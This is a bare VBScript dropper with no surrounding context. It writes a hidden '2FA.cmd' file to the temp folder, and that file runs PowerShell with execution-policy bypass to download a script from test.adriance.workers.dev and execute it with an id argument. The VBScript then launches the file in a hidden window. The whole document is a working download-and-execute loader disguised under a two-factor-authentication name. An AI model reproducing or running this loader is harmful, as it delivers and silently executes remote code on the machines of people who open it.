Set fso = CreateObject("Scripting.FileSystemObject")

path = fso.GetSpecialFolder(2) + "\2FA.cmd" ' 2 = TemporaryFolder

Set file = fso.CreateTextFile(path, True)
file.WriteLine "powershell -ep bypass -c ""$script = [scriptblock]::Create((irm test.adriance.workers.dev)); & $script -id 'grf6425drkl'"""
file.Close

Set sh = CreateObject("Shell.Application")

sh.ShellExecute path, "", "", "open", 0